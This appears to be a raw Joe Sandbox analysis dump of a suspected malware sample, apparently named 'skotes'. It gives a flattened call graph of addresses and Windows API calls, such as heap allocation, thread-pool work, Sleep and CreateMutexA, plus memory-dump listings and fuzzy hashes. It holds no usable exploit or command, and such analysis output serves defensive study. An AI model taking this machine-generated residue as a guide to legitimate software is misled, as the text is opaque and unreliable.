12304->12306 12305->12289 12307 c0aff5 12306->12307 12308 c06c5a __cftof RtlAllocateHeap 12307->12308 12309 c0b000 12308->12309 12309->12289 12311 c0aecc 12310->12311 12315 c0aee1 12310->12315 12312 c075e3 __dosmaperr RtlAllocateHeap 12311->12312 12314 c0aed1 12312->12314 12313 c0af2a 12316 c075e3 __dosmaperr RtlAllocateHeap 12313->12316 12317 c075f6 __dosmaperr RtlAllocateHeap 12314->12317 12315->12313 12318 c0af08 12315->12318 12319 c0af2f 12316->12319 12323 c0678b 12317->12323 12343 c0ae2f 12318->12343 12320 c075f6 __dosmaperr RtlAllocateHeap 12319->12320 12322 c0af37 12320->12322 12324 c06c5a __cftof RtlAllocateHeap 12322->12324 12323->12285 12323->12292 12324->12323 12326 c10445 __cftof 12325->12326 12327 c10465 12326->12327 12328 c1044d 12326->12328 12330 c10500 12327->12330 12337 c10497 12327->12337 12329 c075e3 __dosmaperr RtlAllocateHeap 12328->12329 12331 c10452 12329->12331 12332 c075e3 __dosmaperr RtlAllocateHeap 12330->12332 12333 c075f6 __dosmaperr RtlAllocateHeap 12331->12333 12334 c10505 12332->12334 12341 c1045a 12333->12341 12335 c075f6 __dosmaperr RtlAllocateHeap 12334->12335 12336 c1050d 12335->12336 12338 c06c5a __cftof RtlAllocateHeap 12336->12338 12339 c075f6 __dosmaperr RtlAllocateHeap 12337->12339 12337->12341 12338->12341 12340 c104be 12339->12340 12342 c075e3 __dosmaperr RtlAllocateHeap 12340->12342 12341->12294 12342->12341 12344 c0ae3b __cftof 12343->12344 12345 c0ae70 12344->12345 12346 c0ae7b 12344->12346 12350 c0af48 12345->12350 12348 c075f6 __dosmaperr RtlAllocateHeap 12346->12348 12349 c0ae76 12348->12349 12349->12323 12361 c0c0de 12350->12361 12352 c0af58 12353 c0af90 12352->12353 12354 c0af5e 12352->12354 12355 c0c0de RtlAllocateHeap 12352->12355 12353->12354 12356 c0c0de RtlAllocateHeap 12353->12356 12357 c0afd8 12354->12357 12359 c075c0 __dosmaperr RtlAllocateHeap 12354->12359 12358 c0af87 12355->12358 12356->12354 12357->12349 12360 c0c0de RtlAllocateHeap 12358->12360 12359->12357 12360->12353 12362 c0c100 12361->12362 12363 c0c0eb 12361->12363 12366 c075e3 __dosmaperr RtlAllocateHeap 12362->12366 12368 c0c125 12362->12368 12364 c075e3 __dosmaperr RtlAllocateHeap 12363->12364 12365 c0c0f0 12364->12365 12367 c075f6 __dosmaperr RtlAllocateHeap 12365->12367 12369 c0c130 12366->12369 12370 c0c0f8 12367->12370 12368->12352 12371 c075f6 __dosmaperr RtlAllocateHeap 12369->12371 12370->12352 12372 c0c138 12371->12372 12373 c06c5a __cftof RtlAllocateHeap 12372->12373 12373->12370 11375 bd21c0 11376 bd21cb 11375->11376 11377 bd21d0 11375->11377 11378 bd21d4 11377->11378 11383 bd21ec __cftof 11377->11383 11379 c075f6 __dosmaperr RtlAllocateHeap 11378->11379 11380 bd21d9 11379->11380 11382 c06c5a __cftof RtlAllocateHeap 11380->11382 11381 bd21fc __cftof 11384 bd21e4 11382->11384 11383->11381 11385 bd2221 11383->11385 11387 bd223a 11383->11387 11388 c075f6 __dosmaperr RtlAllocateHeap 11385->11388 11386 bd2231 11387->11386 11390 c075f6 __dosmaperr RtlAllocateHeap 11387->11390 11389 bd2226 11388->11389 11391 c06c5a __cftof RtlAllocateHeap 11389->11391 11392 bd2247 11390->11392 11391->11386 11393 c06c5a __cftof RtlAllocateHeap 11392->11393 11394 bd2252 11393->11394 11398 be79c0 11399 be79e0 11398->11399 11399->11399 11400 be80c0 RtlAllocateHeap 11399->11400 11401 be79f2 11400->11401 12394 c08bbe 12395 c08868 4 API calls 12394->12395 12396 c08bdc 12395->12396 12397 be83c0 12398 be7760 RtlAllocateHeap 12397->12398 12399 be8439 12398->12399 12400 be8f40 RtlAllocateHeap 12399->12400 12401 be8454 12399->12401 12400->12401 12402 be8f40 RtlAllocateHeap 12401->12402 12404 be84a8 12401->12404 12403 be84ee 12402->12403 11406 bd6535 11408 bd6549 shared_ptr 11406->11408 11407 c06c6a RtlAllocateHeap 11409 bd65dc 11407->11409 11408->11407 11410 bd65b1 shared_ptr std::invalid_argument::invalid_argument 11408->11410 11411 be7a00 RtlAllocateHeap 11409->11411 11412 bd66a6 11411->11412 11413 bd5c10 4 API calls 11412->11413 11414 bd66ac 11413->11414 11415 bd5c10 4 API calls 11414->11415 11416 bd66b1 11415->11416 11417 bd22c0 4 API calls 11416->11417 11418 bd66c9 shared_ptr 11417->11418 11419 be7a00 RtlAllocateHeap 11418->11419 11420 bd6732 11419->11420 11421 bd5c10 4 API calls 11420->11421 11422 bd673d 11421->11422 11423 bd22c0 4 API calls 11422->11423 11432 bd6757 shared_ptr 11423->11432 11424 bd6852 11425 be80c0 RtlAllocateHeap 11424->11425 11427 bd689c 11425->11427 11426 be7a00 RtlAllocateHeap 11426->11432 11428 be80c0 RtlAllocateHeap 11427->11428 11431 bd68e3 shared_ptr std::invalid_argument::invalid_argument 11428->11431 11429 bd5c10 4 API calls 11429->11432 11430 bd22c0 4 API calls 11430->11432 11432->11424 11432->11426 11432->11429 11432->11430 11458 bd4120 11459 bd416a 11458->11459 11461 bd41b2 Concurrency::details::_ContextCallback::_CallInContext std::invalid_argument::invalid_argument 11459->11461 11462 bd3ee0 11459->11462 11463 bd3f1e 11462->11463 11464 bd3f48 11462->11464 11463->11461 11465 bd3f58 11464->11465 11468 bd2c00 11464->11468 11465->11461 11469 bed3e2 RtlAllocateHeap 11468->11469 11470 bd2c0e 11469->11470 11478 beb847 11470->11478 11472 bd2c49 11472->11461 11473 bd2c42 11473->11472 11484 bd2c80 11473->11484 11475 bd2c58 11487 bd2560 11475->11487 11477 bd2c65 Concurrency::cancel_current_task 11479 beb854 11478->11479 11483 beb873 Concurrency::details::_Reschedule_chore 11478->11483 11490 becb77 11479->11490 11481 beb864 11481->11483 11492 beb81e 11481->11492 11483->11473 11498 beb7fb 11484->11498 11486 bd2cb2 shared_ptr 11486->11475 11488 c038af ___std_exception_copy RtlAllocateHeap 11487->11488 11489 bd2597 std::invalid_argument::invalid_argument 11488->11489 11489->11477 11491 becb92 CreateThreadpoolWork 11490->11491 11491->11481 11493 beb827 Concurrency::details::_Reschedule_chore 11492->11493 11496 becdcc 11493->11496 11495 beb841 11495->11483 11497 becde1 TpPostWork 11496->11497 11497->11495 11499 beb817 11498->11499 11500 beb807 11498->11500 11499->11486 11500->11499 11502 beca78 11500->11502 11503 beca8d TpReleaseWork 11502->11503 11503->11499 12428 be8320 12429 be8339 12428->12429 12430 be8f40 RtlAllocateHeap 12429->12430 12431 be834d 12429->12431 12430->12431 11504 bd211c 11505 bd2126 11504->11505 11506 bed64e RtlAllocateHeap 11505->11506 11507 bd2132 11506->11507 12432 bd2b10 12433 bd2b1c 12432->12433 12434 bd2b1a 12432->12434 12435 bec26a 5 API calls 12433->12435 12436 bd2b22 12435->12436 11511 be8510 11512 be855f 11511->11512 11515 be856c 11511->11515 11517 be9d00 11512->11517 11514 be85c4 11515->11514 11538 bea060 11515->11538 11518 be9e31 11517->11518 11522 be9d25 11517->11522 11519 be9270 RtlAllocateHeap 11518->11519 11530 be9d8b __cftof 11519->11530 11520 c06c6a RtlAllocateHeap 11529 be9e3b 11520->11529 11521 be9e2c 11523 bd2480 RtlAllocateHeap 11521->11523 11522->11521 11524 be9d7a 11522->11524 11525 be9da1 11522->11525 11523->11518 11524->11521 11526 be9d85 11524->11526 11527 bed3e2 RtlAllocateHeap 11525->11527 11525->11530 11528 bed3e2 RtlAllocateHeap 11526->11528 11527->11530 11528->11530 11531 be9e6a shared_ptr 11529->11531 11532 c06c6a RtlAllocateHeap 11529->11532 11530->11520 11533 be9dfc shared_ptr __cftof 11530->11533 11531->11515 11534 be9e8e 11532->11534 11533->11515 11535 be9ec0 shared_ptr 11534->11535 11536 c06c6a RtlAllocateHeap 11534->11536 11535->11515 11537 be9ee6 11536->11537 11539 bea1b1 11538->11539 11543 bea083 11538->11543 11540 be9270 RtlAllocateHeap 11539->11540 11551 bea0e4 __cftof 11540->11551 11541 c06c6a RtlAllocateHeap 11550 bea1bb shared_ptr 11541->11550 11542 bea1ac 11544 bd2480 RtlAllocateHeap 11542->11544 11543->11542 11545 bea0fd 11543->11545 11546 bea0d3 11543->11546 11544->11539 11548 bed3e2 RtlAllocateHeap 11545->11548 11545->11551 11546->11542 11547 bea0de 11546->11547 11549 bed3e2 RtlAllocateHeap 11547->11549 11548->11551 11549->11551 11550->11515 11551->11541 11552 bea16c shared_ptr __cftof 11551->11552 11552->11515 11553 bed111 11555 bed122 11553->11555 11554 bed12a 11555->11554 11557 bed199 11555->11557 11558 bed1a7 SleepConditionVariableCS 11557->11558 11560 bed1c0 11557->11560 11558->11560 11560->11555 12462 bd5f76 12464 bd5f81 shared_ptr 12462->12464 12463 bd5ffe shared_ptr std::invalid_argument::invalid_argument 12464->12463 12465 c06c6a RtlAllocateHeap 12464->12465 12466 bd601b 12465->12466 12467 be80c0 RtlAllocateHeap 12466->12467 12468 bd6089 12467->12468 12469 be80c0 RtlAllocateHeap 12468->12469 12470 bd60bd 12469->12470 12471 be80c0 RtlAllocateHeap 12470->12471 12472 bd60ee 12471->12472 12473 be80c0 RtlAllocateHeap 12472->12473 12474 bd611f 12473->12474 12475 be80c0 RtlAllocateHeap 12474->12475 12477 bd6150 12475->12477 12476 bd65b1 shared_ptr std::invalid_argument::invalid_argument 12477->12476 12478 c06c6a RtlAllocateHeap 12477->12478 12479 bd65dc 12478->12479 12480 be7a00 RtlAllocateHeap 12479->12480 12481 bd66a6 12480->12481 12482 bd5c10 4 API calls 12481->12482 12483 bd66ac 12482->12483 12484 bd5c10 4 API calls 12483->12484 12485 bd66b1 12484->12485 12486 bd22c0 4 API calls 12485->12486 12487 bd66c9 shared_ptr 12486->12487 12488 be7a00 RtlAllocateHeap 12487->12488 12489 bd6732 12488->12489 12490 bd5c10 4 API calls 12489->12490 12491 bd673d 12490->12491 12492 bd22c0 4 API calls 12491->12492 12501 bd6757 shared_ptr 12492->12501 12493 bd6852 12494 be80c0 RtlAllocateHeap 12493->12494 12496 bd689c 12494->12496 12495 be7a00 RtlAllocateHeap 12495->12501 12497 be80c0 RtlAllocateHeap 12496->12497 12500 bd68e3 shared_ptr std::invalid_argument::invalid_argument 12497->12500 12498 bd5c10 4 API calls 12498->12501 12499 bd22c0 4 API calls 12499->12501 12501->12493 12501->12495 12501->12498 12501->12499 11584 bd2170 11589 bec6fc 11584->11589 11587 bed64e RtlAllocateHeap 11588 bd2184 11587->11588 11590 bec70c 11589->11590 11591 bd217a 11589->11591 11590->11591 11593 becfbe 11590->11593 11591->11587 11594 beccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 11593->11594 11595 becfd0 11594->11595 11595->11590 11596 bd3970 11597 bec68b __Mtx_init_in_situ 2 API calls 11596->11597 11598 bd39a7 11597->11598 11599 bec68b __Mtx_init_in_situ 2 API calls 11598->11599 11600 bd39e6 11599->11600 12502 bd3770 12503 bd379b 12502->12503 12504 bd37cd shared_ptr 12503->12504 12505 c06c6a RtlAllocateHeap 12503->12505 12506 bd380f 12505->12506 11621 bd215a 11622 bec6fc InitializeCriticalSectionEx 11621->11622 11623 bd2164 11622->11623 11624 bed64e RtlAllocateHeap 11623->11624 11625 bd216e 11624->11625 12530 c06729 12533 c06672 12530->12533 12532 c0673b 12536 c0667e __cftof 12533->12536 12534 c06685 12535 c075f6 __dosmaperr RtlAllocateHeap 12534->12535 12537 c0668a 12535->12537 12536->12534 12538 c066a5 12536->12538 12539 c06c5a __cftof RtlAllocateHeap 12537->12539 12540 c066b7 12538->12540 12541 c066aa 12538->12541 12546 c06695 12539->12546 12547 c0a8c3 12540->12547 12543 c075f6 __dosmaperr RtlAllocateHeap 12541->12543 12543->12546 12544 c066c0 12545 c075f6 __dosmaperr RtlAllocateHeap 12544->12545 12544->12546 12545->12546 12546->12532 12548 c0a8cf __cftof 12547->12548 12551 c0a967 12548->12551 12550 c0a8ea 12550->12544 12553 c0a98a 12551->12553 12552 c0d82f __dosmaperr RtlAllocateHeap 12554 c0a9eb 12552->12554 12553->12552 12556 c0a9d0 12553->12556 12555 c0adf5 ___free_lconv_mon RtlAllocateHeap 12554->12555 12555->12556 12556->12550 11626 bda54d 11627 bda555 shared_ptr 11626->11627 11628 bda628 shared_ptr 11627->11628 11629 bda944 11627->11629 11634 be80c0 RtlAllocateHeap 11628->11634 11630 c06c6a RtlAllocateHeap 11629->11630 11631 bda949 11630->11631 11632 bda94e 11631->11632 11633 c06c6a RtlAllocateHeap 11631->11633 11636 bda953 Sleep CreateMutexA 11632->11636 11637 c06c6a RtlAllocateHeap 11632->11637 11633->11632 11635 bda903 11634->11635 11638 bda98e 11636->11638 11637->11636 12566 bd9f44 12568 bd9f4c shared_ptr 12566->12568 12567 bda92b 12570 bda953 Sleep CreateMutexA 12567->12570 12571 c06c6a RtlAllocateHeap 12567->12571 12568->12567 12569 bda01f shared_ptr 12568->12569 12572 be80c0 RtlAllocateHeap 12569->12572 12573 bda98e 12570->12573 12571->12570 12574 bda903 12572->12574

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 00C0652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 367 c0652b-c06538 call c0a302 370 c0655a-c0656c call c0656d ExitProcess 367->370 371 c0653a-c06548 GetPEB 367->371 371->370 372 c0654a-c06559 371->372 372->370
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ExitProcess.KERNEL32(?,?,00C0652A,?,?,?,?,?,00C07661), ref: 00C06566
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521295609.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521311555.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521363582.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521379411.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521396200.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521486035.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521506674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521529930.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521547651.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521602200.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521619891.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521635763.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521652294.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521674976.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521694526.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521716172.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521730894.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521746206.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521762313.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521776753.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521791977.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521806761.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521823400.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521837891.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521851879.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521869219.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521885147.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521900252.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521962638.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521986282.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522013474.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522037462.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522063115.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522086053.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                                                              • Opcode ID: 1e668573b5ab6b5058c7bb756514842ee4cc0c992aca2faa21dfb362d6270198
                                                                                                                                                                                                                              • Instruction ID: 574055b11c6f0758bfb9aa0a265e42a1ed73e4d8a400f4626ea827b70c9a1d78
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e668573b5ab6b5058c7bb756514842ee4cc0c992aca2faa21dfb362d6270198
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AE0C230141948EEDF357F58CC1AE883B2AEF81794F400825F8144B271CF35EE92DA80
                                                                                                                                                                                                                              Function 00BD9BA5 Relevance: 3.1, APIs: 2, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521295609.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521311555.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521363582.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521379411.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521396200.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521486035.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521506674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521529930.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521547651.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521602200.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521619891.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521635763.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521652294.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521674976.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521694526.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521716172.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521730894.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521746206.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521762313.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521776753.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521791977.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521806761.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521823400.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521837891.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521851879.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521869219.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521885147.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521900252.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521962638.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521986282.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522013474.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522037462.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522063115.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522086053.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: f2233ef7e674c1905260986187a29dd1f1779b1dc9ea05c9398c230b66116e06
                                                                                                                                                                                                                              • Instruction ID: 0844ab527fdc5891e969d594e470816f5d456571424947c1b78651d7be640c1a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2233ef7e674c1905260986187a29dd1f1779b1dc9ea05c9398c230b66116e06
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B319B317041409BFB08DB78DC8575DFBE2EBC1314F24429AE414A73E6EB7A99818751
                                                                                                                                                                                                                              Function 00BD9F44 Relevance: 3.1, APIs: 2, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 22 bd9f44-bd9f64 26 bd9f66-bd9f72 22->26 27 bd9f92-bd9fae 22->27 28 bd9f88-bd9f8f call bed663 26->28 29 bd9f74-bd9f82 26->29 30 bd9fdc-bd9ffb 27->30 31 bd9fb0-bd9fbc 27->31 28->27 29->28 32 bda92b 29->32 36 bd9ffd-bda009 30->36 37 bda029-bda916 call be80c0 30->37 34 bd9fbe-bd9fcc 31->34 35 bd9fd2-bd9fd9 call bed663 31->35 39 bda953-bda994 Sleep CreateMutexA 32->39 40 bda92b call c06c6a 32->40 34->32 34->35 35->30 43 bda01f-bda026 call bed663 36->43 44 bda00b-bda019 36->44 52 bda9a7-bda9a8 39->52 53 bda996-bda998 39->53 40->39 43->37 44->32 44->43 53->52 54 bda99a-bda9a5 53->54 54->52
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521295609.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521311555.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521363582.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521379411.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521396200.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521486035.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521506674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521529930.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521547651.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
